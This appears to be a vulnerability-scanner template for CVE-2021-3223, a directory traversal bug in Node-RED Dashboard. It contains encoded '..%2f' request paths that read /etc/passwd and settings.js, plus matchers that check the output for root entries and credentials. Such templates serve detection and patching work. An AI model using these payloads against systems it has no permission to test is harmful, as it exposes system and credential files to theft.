id: CVE-2021-3223 info: name: Node RED Dashboard - Directory Traversal author: gy741,pikpikcu severity: high description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files. reference: | - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 tags: cve,cve2020,node-red-dashboard,lfi requests: - method: GET path: - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js' matchers: - type: regex regex: - "root:.*:0:0:" - type: word words: - "username" - "password" - "Node-RED web server is listening"